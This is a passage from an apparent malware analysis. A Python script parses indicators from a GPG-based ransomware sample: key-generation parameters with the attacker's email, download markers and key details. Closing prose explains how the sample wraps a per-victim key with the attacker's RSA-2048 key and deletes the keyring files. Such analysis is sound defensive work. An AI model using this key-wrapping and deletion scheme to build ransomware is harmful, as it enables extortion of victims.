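GENRSA_PARAMS = """Key-Type: RSA
Key-Length: 1024
Name-Real: genesis
Name-Comment: keybtc@gmail.com
Name-Email: keybtc@gmail.com
"""


def parse_genkey_params(text):
    """Parse a GnuPG batch key-generation parameter file into a dict."""
    return dict(line.split(": ", 1) for line in text.splitlines() if ": " in line)


if __name__ == "__main__":
    print("downloader markers:", downloader_indicators(DROPPER_JS))
    for url, path in extract_downloads(DROPPER_JS):
        print("  %s -> %s" % (url, path))
    key = parse_public_key_header(ARMOR_LINE_1)
    print("attacker key: %s-%d, created %s" % (key["algorithm"], key["bits"], key["created"]))
    victim = parse_genkey_params(GENRSA_PARAMS)
    print("per-victim key: %s-%s" % (victim["Key-Type"], victim["Key-Length"]))
```

On these inputs the attacker key parses as RSA-2048 created 2014-08-05 06:45:40 UTC, the day before the sample was submitted, while genrsa.btc asks GnuPG for a per-victim RSA-1024 key. That fits the batch file encrypting secring.gpg to recipient keybtc and then deleting the gnupg directory, secring.gpg and pubring.gpg: once the per-victim private key has been wrapped with the 2048-bit key and wiped, only the holder of the matching private key can unwrap it.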